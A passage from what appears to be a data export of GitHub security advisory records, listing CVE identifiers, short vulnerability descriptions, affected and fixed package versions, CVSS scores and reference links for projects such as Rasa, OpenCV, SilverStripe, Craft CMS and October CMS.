'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-13T17:39:25Z', 'nvd_published_at': None}" +1.4.0,GHSA-4365-fhm5-qcrx,2021-10-21T20:32:19Z,2021-10-22T16:19:13Z,,['CVE-2021-41127'],Maliciously Crafted Model Archive Can Lead To Arbitrary File Write,"### Impact +An Archive Extraction (Zip Slip) vulnerability in the functionality that allows a user to load a trained model archive in Rasa 2.8.9 and older allows an attacker arbitrary write capability within specific directories using a malicious crafted archive file. + +### Patches +The vulnerability is fixed in Rasa 2.8.10 + +### Workarounds +Mitigating steps for vulnerable end users are to ensure that they do not upload untrusted model files, and restrict CLI or API endpoint access where a malicious actor could target a deployed Rasa instance. + +### For more information +If you have any questions or comments about this advisory: +* Email [the Rasa Security Team](mailto:security@rasa.com) +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'rasa'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.8.10'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/RasaHQ/rasa/security/advisories/GHSA-4365-fhm5-qcrx'}, {'type': 'WEB', 'url': 'https://github.com/RasaHQ/rasa/commit/1b6b502f52d73b4f8cd1959ce724b8ad0eb33989'}, {'type': 'PACKAGE', 'url': 'https://github.com/RasaHQ/rasa'}]","{'cwe_ids': ['CWE-22', 'CWE-23'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-21T20:32:19Z', 'nvd_published_at': '2021-10-21T21:15:00Z'}" +1.4.0,GHSA-33h2-69j3-r336,2021-11-18T00:07:15Z,2021-10-12T22:00:51Z,,['CVE-2017-12598'],Out-of-bounds Read in OpenCV ,"OpenCV (Open Source Computer Vision Library) through 3.3 (corresponding to OpenCV-Python 3.3.0.9) has an out-of-bounds read error in the cv::RBaseStream::readBlock function in modules/imgcodecs/src/bitstrm.cpp when reading an image file by using cv::imread, as demonstrated by the 8-opencv-invalid-read-fread test case.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'opencv-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.1.11'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.3.0.9'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-contrib-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.1.11'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.3.0.9'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-12598'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/issues/9309'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/pull/9376'}, {'type': 'PACKAGE', 'url': 'https://github.com/opencv/opencv-python'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv-python/releases/tag/11'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv-python/releases/tag/9'}, {'type': 'WEB', 'url': 'https://github.com/xiaoqx/pocs/blob/master/opencv.md'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2018/07/msg00030.html'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/10/msg00028.html'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/201712-02'}]","{'cwe_ids': ['CWE-125'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-08T14:49:53Z', 'nvd_published_at': '2017-08-07T01:29:00Z'}" +1.4.0,GHSA-r7rh-g777-g5gx,2021-10-18T14:34:41Z,2021-10-12T18:49:23Z,,['CVE-2021-28661'],SilverStripe GraphQL Server permission checker not inherited by query subclass.,Default SilverStripe GraphQL Server (aka silverstripe/graphql) 3.x through 3.4.1 permission checker not inherited by query subclass.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'silverstripe/graphql'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.5.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-28661'}, {'type': 'WEB', 'url': 'https://github.com/silverstripe/silverstripe-graphql/pull/407/commits/16961459f681f7b32145296189dfdbcc7715e6ed'}, {'type': 'PACKAGE', 'url': 'https://github.com/silverstripe/silverstripe-graphql'}, {'type': 'WEB', 'url': 'https://github.com/silverstripe/silverstripe-graphql/releases'}, {'type': 'WEB', 'url': 'https://github.com/silverstripe/silverstripe-graphql/releases/tag/3.5.2'}, {'type': 'WEB', 'url': 'https://www.silverstripe.org/download/security-releases/CVE-2021-28661'}]","{'cwe_ids': ['CWE-863'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-08T21:35:47Z', 'nvd_published_at': '2021-10-07T15:15:00Z'}" +1.4.0,GHSA-957j-59c2-j692,2023-09-07T18:57:59Z,2021-10-12T16:26:37Z,,['CVE-2020-28282'],Prototype pollution in getobject,Prototype pollution vulnerability in 'getobject' version 0.1.0 allows an attacker to cause a denial of service and may lead to remote code execution.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'getobject'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-28282'}, {'type': 'PACKAGE', 'url': 'https://github.com/cowboy/node-getobject'}, {'type': 'WEB', 'url': 'https://github.com/cowboy/node-getobject/blob/aba04a8e1d6180eb39eff09990c3a43886ba8937/lib/getobject.js#L48'}, {'type': 'WEB', 'url': 'https://www.whitesourcesoftware.com/vulnerability-database/CVE-2020-28282'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-10-08T22:07:57Z', 'nvd_published_at': '2020-12-29T18:15:00Z'}" +1.4.0,GHSA-h7vq-5qgw-jwwq,2021-10-18T19:11:00Z,2021-10-18T19:04:16Z,,['CVE-2021-41824'],CSV Injection Vulnerability,"### Impact +In some circumstances, it was possible to export data in CSV format that could trigger a payload in old versions of Excel. + +If you are accepting user input from untrusted sources and will be exporting that data in CSV format from element index pages and there is a chance users will open that on old versions of Excel, then you should update. + +### Patches +This has been patched in Craft 3.7.14. + +### References +* https://github.com/craftcms/cms/blob/develop/CHANGELOG.md#3714---2021-09-28 +* https://twitter.com/craftcmsupdates/status/1442928690145366018 + +### For more information + +If you have any questions or comments about this advisory, email us at support@craftcms.com + +---------- + +Credits: BAE Systems AI Vulnerability Research Team – Azrul Ikhwan Zulkifli","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'craftcms/cms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.4.0'}, {'fixed': '3.7.14'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/craftcms/cms/security/advisories/GHSA-h7vq-5qgw-jwwq'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41824'}, {'type': 'WEB', 'url': 'https://github.com/craftcms/cms/commit/c9cb2225f1b908fb1e8401d401219228634b26b2'}, {'type': 'PACKAGE', 'url': 'https://github.com/craftcms/cms'}, {'type': 'WEB', 'url': 'https://github.com/craftcms/cms/blob/develop/CHANGELOG.md#3714---2021-09-28'}, {'type': 'WEB', 'url': 'https://twitter.com/craftcmsupdates/status/1442928690145366018'}]","{'cwe_ids': ['CWE-1236'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-15T17:36:16Z', 'nvd_published_at': '2021-09-30T00:15:00Z'}" +1.4.0,GHSA-c7pr-343r-5c46,2021-10-06T13:26:05Z,2021-10-06T17:48:46Z,,['CVE-2021-41122'],missing clamps for decimal args in external functions,"### Impact + +The following code does not properly validate that its input is in bounds. + +```python +@external +def foo(x: decimal) -> decimal: + return x +``` + +### Patches +0.3.0 / #2447 + +### Workarounds +Don't use decimal args + +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'vyper'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.3.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/vyperlang/vyper/security/advisories/GHSA-c7pr-343r-5c46'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41122'}, {'type': 'WEB', 'url': 'https://github.com/vyperlang/vyper/pull/2447'}, {'type': 'PACKAGE', 'url': 'https://github.com/vyperlang/vyper'}]","{'cwe_ids': ['CWE-682'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-06T13:26:05Z', 'nvd_published_at': '2021-10-05T23:15:00Z'}" +1.4.0,GHSA-m2r3-8492-vx59,2021-10-06T15:13:57Z,2021-10-06T17:47:46Z,,['CVE-2021-23372'],Denial of Service (DoS) in mongo-express,"All versions of package mongo-express are vulnerable to Denial of Service (DoS) when exporting an empty collection as CSV, due to an unhandled exception, leading to a crash.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'mongo-express'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.54.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23372'}, {'type': 'PACKAGE', 'url': 'https://github.com/mongo-express/mongo-express'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-MONGOEXPRESS-1085403'}]","{'cwe_ids': ['CWE-754'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-06T15:13:57Z', 'nvd_published_at': '2021-04-13T20:15:00Z'}" +1.4.0,GHSA-g6v7-vqhx-6v6c,2021-10-18T13:50:38Z,2021-10-12T17:23:40Z,,['CVE-2021-3312'],XML External Entity Reference in org.opencms:opencms-core,"An XML external entity (XXE) vulnerability in Alkacon OpenCms 11.0, 11.0.1 and 11.0.2 allows remote authenticated users with edit privileges to exfiltrate files from the server's file system by uploading a crafted SVG document.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.opencms:opencms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '11.0.0'}, {'fixed': '12.0.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 11.0.2'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3312'}, {'type': 'WEB', 'url': 'https://github.com/alkacon/opencms-core/issues/721'}, {'type': 'WEB', 'url': 'https://github.com/alkacon/opencms-core/issues/725'}, {'type': 'WEB', 'url': 'https://github.com/alkacon/opencms-core/commit/92e035423aa6967822d343e54392d4291648c0ee'}, {'type': 'PACKAGE', 'url': 'https://github.com/alkacon/opencms-core'}, {'type': 'WEB', 'url': 'https://github.com/alkacon/opencms-core/releases'}]","{'cwe_ids': ['CWE-611'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-11T18:55:10Z', 'nvd_published_at': '2021-10-08T15:15:00Z'}" +1.4.0,GHSA-m5v7-pr32-mjx2,2021-11-18T20:37:40Z,2021-10-12T16:29:13Z,,['CVE-2020-13909'],Critical severity vulnerability in Ignition,"The Ignition page before version 2.0.5 for Laravel mishandles globals, _get, _post, _cookie, and _env. + +NOTE: in the 1.x series, versions 1.16.15 and later are unaffected as a consequence of the CVE-2021-43996 fix.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'facade/ignition'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.0.5'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'facade/ignition'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.16.15'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-13909'}, {'type': 'WEB', 'url': 'https://github.com/github/advisory-database/issues/2316'}, {'type': 'PACKAGE', 'url': 'https://github.com/facade/ignition'}, {'type': 'WEB', 'url': 'https://github.com/facade/ignition/compare/2.0.4...2.0.5'}, {'type': 'WEB', 'url': 'https://github.com/facade/ignition/releases/tag/2.0.5'}, {'type': 'WEB', 'url': 'https://www.cve.org/CVERecord?id=CVE-2020-13909'}]","{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-10-08T22:26:02Z', 'nvd_published_at': '2020-06-07T20:15:00Z'}" +1.4.0,GHSA-vmfh-c547-v45h,2021-10-06T13:46:32Z,2021-10-06T17:48:27Z,,['CVE-2021-33575'],Remote code execution in ruby-jss,The Pixar ruby-jss gem before 1.6.0 allows remote attackers to execute arbitrary code because of the Plist gem's documented behavior of using Marshal.load during XML document processing.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'ruby-jss'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.6.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-33575'}, {'type': 'PACKAGE', 'url': 'https://github.com/PixarAnimationStudios/ruby-jss'}, {'type': 'WEB', 'url': 'https://github.com/PixarAnimationStudios/ruby-jss/blob/e6d48dd8c77f9275c76787d60d3472615fcd9b77/CHANGES.md#160---2021-05-24'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-vmfh-c547-v45h'}, {'type': 'WEB', 'url': 'https://github.com/patsplat/plist/tree/ce8f9ae42a114f603ea200c955e420782bffc4ad#label-Security+considerations'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/ruby-jss/CVE-2021-33575.yml'}]","{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-10-06T13:46:32Z', 'nvd_published_at': '2021-05-25T23:15:00Z'}" +1.4.0,GHSA-m43c-649m-pm48,2021-11-18T15:31:29Z,2021-10-12T22:03:32Z,,['CVE-2017-1000450'],Integer Overflow or Wraparound in OpenCV.,"In opencv/modules/imgcodecs/src/utils.cpp, functions FillUniColor and FillUniGray do not check the input length, which can lead to integer overflow. If the image is from remote, may lead to remote code execution or denial of service. This affects Opencv 3.3 (corresponding with OpenCV-Python 3.3.0.9) and earlier.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'opencv-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.1.11'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.3.0.9'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-contrib-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.1.11'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.3.0.9'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-1000450'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/issues/9723'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/pull/9726/commits/c58152d94ba878b2d7d76bcac59146312199b9eb'}, {'type': 'WEB', 'url': 'https://github.com/blendin/pocs/blob/master/opencv/0.OOB_Write_FillUniColor'}, {'type': 'PACKAGE', 'url': 'https://github.com/opencv/opencv-python'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2018/01/msg00008.html'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2018/07/msg00030.html'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/10/msg00028.html'}]","{'cwe_ids': ['CWE-190'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-07T20:09:22Z', 'nvd_published_at': '2018-01-02T17:29:00Z'}" +1.4.0,GHSA-c87f-fq5g-63r2,2021-10-08T21:32:32Z,2021-10-12T17:51:11Z,,['CVE-2021-42053'],Cross-site scripting in Unicorn framework,The Unicorn framework through 0.35.3 for Django allows XSS via component.name.,[],"[{'package': {'ecosystem': 'PyPI', 'name': 'django-unicorn'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.36.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-42053'}, {'type': 'WEB', 'url': 'https://github.com/adamghill/django-unicorn/pull/288/commits/aa5b9835d946bd9893ef02e556859e3ea62cc5e2'}, {'type': 'PACKAGE', 'url': 'https://github.com/adamghill/django-unicorn'}, {'type': 'WEB', 'url': 'https://github.com/adamghill/django-unicorn/compare/0.35.3...0.36.0'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/164442/django-unicorn-0.35.3-Cross-Site-Scripting.html'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-08T21:32:32Z', 'nvd_published_at': '2021-10-07T06:15:00Z'}" +1.4.0,GHSA-j66h-cc96-c32q,2021-10-18T14:54:10Z,2021-10-12T18:42:30Z,,['CVE-2021-36150'],Cross-site Scripting in SilverStripe Framework,SilverStripe Framework through 4.8.1 allows XSS.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'silverstripe/admin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0'}, {'fixed': '1.8.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-36150'}, {'type': 'PACKAGE', 'url': 'https://github.com/silverstripe/silverstripe-framework'}, {'type': 'WEB', 'url': 'https://github.com/silverstripe/silverstripe-framework/releases'}, {'type': 'WEB', 'url': 'https://www.silverstripe.org/download/security-releases/CVE-2021-36150'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-08T21:42:15Z', 'nvd_published_at': '2021-10-07T14:15:00Z'}" +1.4.0,GHSA-2p6r-37p9-89p2,2021-10-21T14:32:55Z,2021-10-21T17:46:57Z,,['CVE-2021-41135'],Authz Module Non-Determinism,"### Impact + +Consensus failure for 0.43.x and 0.44.{0,1} users. +Funds and balances are safe. + +### Patches + +0.44.2 + +### Workarounds + +Manually patch the code. + +--- + +Full details posted in https://forum.cosmos.network/t/cosmos-sdk-vulnerability-retrospective-security-advisory-jackfruit-october-12-2021/5349.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/cosmos/cosmos-sdk'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.43.0'}, {'fixed': '0.44.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/cosmos/cosmos-sdk/security/advisories/GHSA-2p6r-37p9-89p2'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41135'}, {'type': 'WEB', 'url': 'https://github.com/cosmos/cosmos-sdk/commit/68ab790a761e80d3674f821794cf18ccbfed45ee'}, {'type': 'WEB', 'url': 'https://forum.cosmos.network/t/cosmos-sdk-vulnerability-retrospective-security-advisory-jackfruit-october-12-2021/5349'}, {'type': 'PACKAGE', 'url': 'https://github.com/cosmos/cosmos-sdk'}, {'type': 'WEB', 'url': 'https://github.com/cosmos/cosmos-sdk/releases/tag/v0.44.2'}]","{'cwe_ids': ['CWE-754'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-20T15:36:34Z', 'nvd_published_at': '2021-10-20T18:15:00Z'}" +1.4.0,GHSA-5pcx-vqjp-p34w,2021-10-01T17:49:59Z,2021-10-04T20:11:03Z,,['CVE-2021-25963'],Cross-site Scripting in shuup,"In Shuup, versions 1.6.0 through 2.10.8 are vulnerable to reflected Cross-Site Scripting (XSS) that allows execution of arbitrary javascript code on a victim browser. This vulnerability exists due to the error page contents not escaped.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'shuup'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.6.0'}, {'fixed': '2.11.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-25963'}, {'type': 'WEB', 'url': 'https://github.com/shuup/shuup/commit/75714c37e32796eb7cbb0d977af5bcaa26573588'}, {'type': 'PACKAGE', 'url': 'https://github.com/shuup/shuup'}, {'type': 'WEB', 'url': 'https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25963'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-01T17:49:59Z', 'nvd_published_at': '2021-09-30T08:15:00Z'}" +1.4.0,GHSA-5rpc-gwh9-q9fg,2021-11-18T15:33:54Z,2021-10-12T22:02:21Z,,['CVE-2017-12862'],Improper Restriction of Operations within the Bounds of a Memory Buffer in OpenCV,"In modules/imgcodecs/src/grfmt_pxm.cpp, the length of buffer AutoBuffer _src is small than expected, which will cause copy buffer overflow later. If the image is from remote, may lead to remote code execution or denial of service. This affects OpenCV 3.3 (corresponding to OpenCV-Python 3.3.0.9) and earlier.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'opencv-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.1.11'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.3.0.9'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-contrib-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.1.11'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.3.0.9'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-12862'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/issues/9370'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/pull/9376'}, {'type': 'PACKAGE', 'url': 'https://github.com/opencv/opencv-python'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2018/07/msg00030.html'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/10/msg00028.html'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/201712-02'}]","{'cwe_ids': ['CWE-119', 'CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-07T20:44:45Z', 'nvd_published_at': '2017-08-15T16:29:00Z'}" +1.4.0,GHSA-mc7w-4cjf-c973,2021-10-07T19:30:03Z,2021-10-12T22:06:57Z,,['CVE-2019-10061'],OS Command Injection in node-opencv,utils/find-opencv.js in node-opencv (aka OpenCV bindings for Node.js) prior to 6.1.0 is vulnerable to Command Injection. It does not validate user input allowing attackers to execute arbitrary commands.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'opencv'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.1.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-10061'}, {'type': 'WEB', 'url': 'https://github.com/peterbraden/node-opencv/commit/81a4b8620188e89f7e4fc985f3c89b58d4bcc86b'}, {'type': 'WEB', 'url': 'https://github.com/peterbraden/node-opencv/commit/aaece6921d7368577511f06c94c99dd4e9653563'}, {'type': 'PACKAGE', 'url': 'https://github.com/peterbraden/node-opencv/'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/789'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/opencv'}]","{'cwe_ids': ['CWE-78'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-10-07T19:30:03Z', 'nvd_published_at': None}" +1.4.0,GHSA-fr58-2xhv-qp3w,2021-10-08T14:44:47Z,2021-10-12T22:01:16Z,,['CVE-2017-12600'],Denial of Service in OpenCV,"OpenCV (Open Source Computer Vision Library) through 3.3 (corresponding to OpenCV-Python 3.3.0.9) has a denial of service (CPU consumption) issue, as demonstrated by the 11-opencv-dos-cpu-exhaust test case.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'opencv-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.1.11'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.3.0.9'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-contrib-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.1.11'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.3.0.9'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-12600'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/issues/9311'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/pull/9376'}, {'type': 'PACKAGE', 'url': 'https://github.com/opencv/opencv-python'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv-python/releases/tag/11'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv-python/releases/tag/9'}, {'type': 'WEB', 'url': 'https://github.com/xiaoqx/pocs/blob/master/opencv.md'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/201712-02'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-08T14:44:47Z', 'nvd_published_at': None}" +1.4.0,GHSA-6gjf-7w99-j7x7,2022-10-13T18:02:46Z,2021-10-06T17:46:40Z,,['CVE-2021-41126'],Deleted Admin Can Sign In to Admin Interface,"### Impact +Assuming an administrator once had previous access to the admin interface, they may still be able to sign in to the backend using October CMS v2.0. + +### Patches +The issue has been patched in v2.1.12 + +### Workarounds + +- Reset the password of the deleted accounts to prevent them from signing in. + +- Please contact hello@octobercms.com for code change instructions if you are unable to upgrade. + +### References + +Credits to: +• Daniel Bidala + +### For more information +If you have any questions or comments about this advisory: +* Email us at [hello@octobercms.com](mailto:hello@octobercms.com) +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'october/october'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.1.0'}, {'fixed': '2.1.12'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'october/system'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.1.0'}, {'fixed': '2.1.12'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/octobercms/october/security/advisories/GHSA-6gjf-7w99-j7x7'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41126'}, {'type': 'PACKAGE', 'url': 'https://github.com/octobercms/october'}, {'type': 'WEB', 'url': 'https://octobercms.com/changelog'}]","{'cwe_ids': ['CWE-287'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-06T17:27:51Z', 'nvd_published_at': '2021-10-06T18:15:00Z'}" +1.4.0,GHSA-3374-7h99-xr85,2021-10-29T13:52:23Z,2021-10-25T19:43:05Z,,['CVE-2020-23049'],Cross-site scripting in forkcms,"Fork CMS Content Management System v5.8.0 was discovered to contain a cross-site scripting (XSS) vulnerability in the `Displayname` field when using the `Add`, `Edit` or `Register' functions. This vulnerability allows attackers to execute arbitrary web scripts or HTML.","[{'type': 'CVSS_V3', 'score': 